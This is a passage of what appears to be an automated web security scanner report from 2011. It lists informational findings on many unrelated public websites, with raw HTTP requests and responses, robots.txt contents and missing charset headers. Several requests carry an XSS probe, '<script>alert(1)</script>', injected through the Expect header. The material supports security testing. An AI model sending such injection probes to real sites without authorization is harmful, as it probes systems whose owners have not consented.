Disallow: /mcj/user/template_content/kwCom/core_image
...[SNIP]...

27.1845. http://www.youtorrent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtorrent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtorrent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:50:37 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 03 Dec 2010 14:00:29 GMT
ETag: "a30043-7e-49681f6003940"
Accept-Ranges: bytes
Content-Length: 126
Cache-Control: max-age=2592000
Expires: Fri, 03 Jun 2011 03:50:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /tag/*/*
Disallow: /*?
Disallow: /login
Disallow: /register
Disallow: /admin
Disallow: /logs
Allow: /

27.1846. http://www.yubanet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yubanet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yubanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:23 GMT
Server: Apache/2.2.14
Last-Modified: Mon, 14 Jul 2008 16:06:24 GMT
ETag: "804df0-d4-451fe12b16000"
Accept-Ranges: bytes
Content-Length: 212
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /01/
Disallow: /excuse/
Disallow: /dev/
Disallow: /subscribe/
Disallow: /webal/
Disallow: /Images/

User-agent: Googlebot
Allow: /

User-agent: Googlebot-Im
...[SNIP]...

27.1847. http://www.yuddy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yuddy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yuddy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:11 GMT
Server: Apache/2.2.16 (Atomic)
Last-Modified: Wed, 27 Feb 2008 09:41:10 GMT
ETag: "c6c28b-42-447209ae3f980"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.yuddy.com/sitemap.xml
Disallow:

27.1848. http://www.yugiohcardguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yugiohcardguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yugiohcardguide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:03 GMT
Server: Apache
Last-Modified: Tue, 15 May 2007 00:08:43 GMT
ETag: "a2c60a1-72-43077095a58c0"
Accept-Ranges: bytes
Content-Length: 114
Vary: Accept-Encoding
Cache-Control: max-age=172800, proxy-revalidate
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /Connections/
Disallow: /data/
Disallow: /explode/
Disallow: /images/

27.1849. http://www.yzchoice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yzchoice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yzchoice.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:04 GMT
Server: Apache
Last-Modified: Tue, 03 Aug 2010 22:38:18 GMT
ETag: "a7c69c-75-48cf2f937ca80"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /css
Disallow: /inc
Disallow: /images
Disallow: /blog.old
Disallow: /blog
Disallow: /js

27.1850. http://www.z6marketing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.z6marketing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.z6marketing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:25 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 19 Jan 2009 17:38:37 GMT
ETag: "132186d7-91-460d9647e2140"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain

Sitemap: /sitemap.xml

User-agent: *
Disallow: /bilsmith/
Disallow: /offers/
Disallow: /scripts/
Disallow: /shared/
Disallow: /tracking/

27.1851. http://www.zeeprobe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zeeprobe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zeeprobe.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/plain
Last-Modified: Thu, 10 Jan 2008 08:21:48 GMT
Accept-Ranges: bytes
ETag: "0b6f2d76153c81:5618"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:13 GMT
Connection: close

User-agent: *
Disallow: /OldFiles/
Disallow: /old17=8-07/
Disallow: /google4f4fe2d9781e1fe3.html
Sitemap: http://www.zeeprobe.com/sitemap.xml

27.1852. http://www.ziggityzoom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ziggityzoom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ziggityzoom.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:13:46 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-ldmjhgml=F507ED0203A6AE3C242BBD49544E61E2; path=/
Last-Modified: Sat, 06 Feb 2010 20:39:00 GMT
Content-Length: 271

#
# robots.txt for http://www.ziggityzoom.com/
#
# $Id: robots.txt,v 1.0 2007/11/06 03:31:19 tmedlen Exp $
#

User-agent: *
Disallow: /inc/
Disallow: /_admin/
Disallow: /openads/

User-Agent: Googlebo
...[SNIP]...

27.1853. http://www.zimbra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zimbra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zimbra.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:50 GMT
Server: Apache/2.2.3 (Oracle)
Last-Modified: Tue, 26 Apr 2011 17:54:53 GMT
ETag: "e94f9-37-4a1d6056dd540"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww-zimbra-prod-web-pool=2738778378.20480.0000; path=/

User-agent: *
Disallow: /search/
Disallow: /blogadmin/

27.1854. http://www.zoodles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoodles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zoodles.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 04 May 2011 01:06:07 GMT
Content-Type: text/plain
Content-Length: 402
Last-Modified: Tue, 03 May 2011 04:25:01 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1855. http://www.zoomstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoomstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zoomstore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:47 GMT
Server: Apache/1.3.34 (Unix)
Last-Modified: Sun, 12 Jan 2003 20:35:26 GMT
ETag: "164041e-225-3e21d18e"
Accept-Ranges: bytes
Content-Length: 549
Connection: close
Content-Type: text/plain

User-Agent: WebCopier
Disallow: /

User-Agent: *
Disallow: /agifs/ /bgifs/ /cgifs/ /dgifs/ /egifs/ /fgifs/ /ggifs/
Disallow: /hgifs/ /igifs/ /jgifs/ /kgifs/ /lgifs/ /mgifs/ /ngifs/
Disallow: /ogifs/ /
...[SNIP]...

27.1856. http://www.zurichna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zurichna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zurichna.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:17 GMT
Server: Apache
Set-Cookie: BIGipServermoss-internet.rz.ch.zurich.com_80=732184074.20480.0000; path=/; HttpOnly
Content-Type: text/plain
Last-Modified: Wed, 22 Sep 2010 07:29:25 GMT
Content-Length: 440
Cache-Control: private,max-age=0
ResourceTag: rt:54C7AD7E-A1EC-4CCC-BA14-FCB45EC57870@00000000005
Exires: Tue, 19 Apr 2011 04:04:17 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
ETag: "{54C7AD7E-A1EC-4CCC-BA14-FCB45EC57870},5"
S: MCA01
X-Powered-By: ASP.NET
Connection: close

...User-Agent: *
Disallow: /_layouts/
Disallow: /_vti_bin/
Disallow: /ReusableContent/
Disallow: /Reports%20List/
Disallow: /WorkflowTasks/
Disallow: /SiteCollectionImages/
Disallow: /Documents
...[SNIP]...

28. Multiple content types specified  previous  next
There are 2 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://www.fellowes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fellowes.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fellowes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 4771
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:48 GMT

<%@ Page CodeBehind="error_page.aspx.cs" Language="c#" AutoEventWireup="True" Inherits="Fellowes.site.error_page" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org
...[SNIP]...
</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <link rel="stylesheet" type="text/css" href="http://www.fellowes.com/fellowes/css/master.css" title="master">
...[SNIP]...

28.2. http://www.virginialottery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginialottery.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virginialottery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 10659
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:00 GMT

<%
dim location, menu_select
location = ""
%>

<html>
<head>
<title>Official Home of the Virginia Lottery</title>
<meta name="description" content="The Virginia Lottery is a state-run lottery
...[SNIP]...
ng,six numbers,subscriptions,the Big Game,three numbers,Tuesday drawing,Tuesday numbers,Virginia gambling,Virginia Lottery,WAVY,WCYB,WDBJ,WTVR,Wednesday drawing,where the money goes,winning numbers">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript" language="JavaScript1.2" src="stm31.js">
...[SNIP]...

29. HTML does not specify charset  previous  next
There are 335 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


29.1. http://4qinvite.4q.iperceptions.com/trackimage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /trackimage.aspx

Request

GET /trackimage.aspx?studyID=34559&langID=1 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=imez4q55xb44ke45laylrw55

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Content-Length: 1942

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.<..
...[SNIP]...

29.2. http://beam.to/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:07 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

29.3. http://beam.to/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /login.asp

Request

GET /login.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:06 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 3116


<html><head><title>BeamTo</title>
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table border="0" width="910" cellpadding="0" cellspaceing=
...[SNIP]...

29.4. http://beam.to/start.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /start.asp

Request

GET /start.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 4251


<html><head><title>BeamTo</title>
<!-- TradeDoubler site verification 1914031 -->
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">

<table b
...[SNIP]...

29.5. http://mads.cnet.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:56 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:28:56 GMT
Content-Length: 2049

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...

29.6. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcwLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIyLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjg4OWFhYTUtZTZjYi00ZTkyLWI1NzItNDU3ZTQ4MjExYjMyIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY25ldG5ld3NfYXRmIiwgIGRpdjogICAgICAgICAgIjY4ODlhYWE1LWU2Y2ItNGU5Mi1iNTcyLTQ1N2U0ODIxMWIzMiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMiwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2F0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0MTcsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5OTM4LCAiYnV5IjozMzExLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5NjE1LCAiYnV5IjoxMjQzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NjYyLCAiYnV5IjoxODksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODc2NywgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDcifQ==
Content-Length: 1837
Content-Type: text/html
Date: Wed, 04 May 2011 01:28:54 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

29.7. http://tracking.moon-ray.com/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:55:22 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 168

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617824;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

29.8. http://www.1000ventures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1000ventures.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.1000ventures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:27:04 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.9. http://www.18-yo-teen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.18-yo-teen.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.18-yo-teen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.10. http://www.1bctools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1bctools.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.1bctools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:34:44 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.11. http://www.321chat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.321chat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
